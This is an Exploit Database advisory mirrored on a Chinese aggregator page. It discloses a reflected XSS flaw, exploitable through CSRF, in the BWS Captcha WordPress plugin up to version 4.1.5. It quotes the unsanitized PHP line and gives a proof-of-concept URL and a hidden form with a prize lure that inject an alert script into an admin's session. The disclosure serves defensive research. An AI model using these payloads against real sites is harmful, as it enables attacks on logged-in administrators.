WordPress Plugin Best Web Soft Captcha 4.1.5 – Multiple Vulnerabilities

• Exploit Database
• 113 阅读

• 作者： Colette Chamberland
  日期： 2016-03-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39547/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35

  * Exploit Title: BWS Captcha Multiple Vulnerabilities * Discovery Date:12.03.2015 * Public Disclosure Date:03.10.2016 * Exploit Author: Colette Chamberland * Contact: colette@wordfence.com * Vendor Homepage: http://bestwebsoft.com/ * Software Link: https://wordpress.org/plugins/captcha/ * Version:<=4.1.5 * Tested on: WordPress 4.2.x * Category: WordPress * CVE: Requested but none received Description ================================================================================ Unsanitized input in whitelist.php:   297: $message = __( &apos;Search results for&apos;, $this->textdomain ) . &apos;&nbsp;:&nbsp;&apos; . $_REQUEST[&apos;s&apos;];   PoC ================================================================================ The variable can be passed in using a get as well as a post. An attacker could send unsuspecting authenticated admin a url crafted like such:   http://wwww.victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist&s=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E   or they can send a form (no CSRF token check)   <form method="post" action="http://victim.com/wp-admin/admin.php?page=captcha.php&action=whitelist"> <input type="hidden" name="s" value="<script>alert(1);</script>"> <input type="submit" name="Search IP" value="Click here to claim your prize!"> </form>   and it would execute XSS as long as they were logged in to the site.